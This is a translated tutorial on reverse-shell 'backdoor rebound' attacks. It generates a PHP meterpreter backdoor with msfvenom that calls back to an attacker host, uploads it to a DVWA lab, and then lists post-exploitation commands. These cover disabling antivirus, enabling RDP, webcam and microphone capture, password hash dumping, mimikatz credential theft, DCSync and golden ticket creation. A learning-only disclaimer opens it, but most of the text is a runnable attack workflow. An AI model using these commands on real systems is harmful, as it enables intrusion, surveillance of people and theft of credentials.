Note:
The content of this chapter is for learning only, do not use it for illegal purposes (be a good white hat)
(1) What is backdoor rebound
Backdoor rebound means that after an attacker successfully invades a computer, he installs a "backdoor program" on the target computer and connects the program with a reverse shell. This "backdoor" is usually a maliciously modified version of a well-written script, software tool, or operating system. It will hide on the attacked computer and open a special port to remotely control the attacker's Shell to Manipulate the computer.
When an attacker uses a backdoor program to attack, it will initiate a connection to a predefined attacker host, allowing the attacker to remotely connect to the target computer through a reverse shell. In this way, the attacker can use this "backdoor program" to easily remotely control the target computer after login verification. In many cases, attackers use this method to perform various malicious operations, including modifying or manipulating system files, viewing, tampering, and stealing sensitive user information.
(2) Experiment demonstration
1. Use the monitoring module - handler
use exploit/multi/handler
2. Configure the attack load and set the payload
Set the attack load payload of php:
命令:set payload php/meterpreter/reverse_tcp
3. Generate a php backdoor to attack and obtain meterpreterf
Order:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.44 lport=4444 R>shell.php
-p: Specify the payload (attack load) to be used, where lhost is the IP of the attacking machine, and lport is the port of the attacking machine
R>shell.php: the generated php backdoor file is shell.php
4. Upload the php backdoor file and upload the file to the target website (dvwa shooting range)
In the attack machine kali, the attack starts when the run or lportm command is run. After the attack, if a user accesses the Trojan file shell.php, msf will enter the meterpreter tool, indicating that the server has executed the Trojan file shell.php.
We can get the username of the host through the back door successfully
The following are the commands that can be used for meterpreter and for the window system
View process: ps
View the current process number: getpid
View system information: sysinfo
Check whether the target machine is a virtual machine: run post/windows/gather/checkvm
View complete network settings: route
View current permissions: getuid
Automatic privilege escalation: getsystem
Close the antivirus software: run post/windows/manage/killav
Start Remote Desktop Protocol: run post/windows/manage/enable_rdp
List currently logged on users: run post/windows/gather/enum_logged_on_users
View current applications: run post /windows/gather/enum_applications
Grab a screenshot of the target machine: load espia; screengrab
Get camera devices: webcam_list
Control camera: webcam_snap
Live webcam: webcam_stream
Control recording: record_mic
View the directory currently on the target machine: pwd
View the current directory: getlwd
Dump the current user password hash run hashdump
Username: SID: LM Hash: NTLM Hash:::
You can also use the following command to export higher authority run windows/gather/smart_hashdump
Grab the username and password for automatic login run windows/gather/credentials/windows_autologin
Obtain the plaintext password directly (note that this function needs to obtain the system permission to obtain the system permission, and you need to enter getsystem)
Preferred terminal input load kiwi to load kiwi
creds_all: List all credentials
creds_kerberos: List all kerberos credentials
creds_msv: List all msv credentials
creds_ssp: List all ssp credentials
creds_tspkg: List all tspkg credentials
creds_wdigest: List all wdigest credentials
dcsync: Retrieve user account information via DCSync
dcsync_ntlm: Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create: create a golden ticket
kerberos_ticket_list: list kerberos tickets
kerberos_ticket_purge: purge kerberos tickets
kerberos_ticket_use: use kerberos tickets
kiwi_cmd: Execute the command of mimikatz, followed by the command of mimikatz.exe
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets: dump out the ciphertext of lsa
password_change: change password
wifi_list: list the wifi configuration files of the current user
wifi_list_shared: list shared wifi profiles/encodings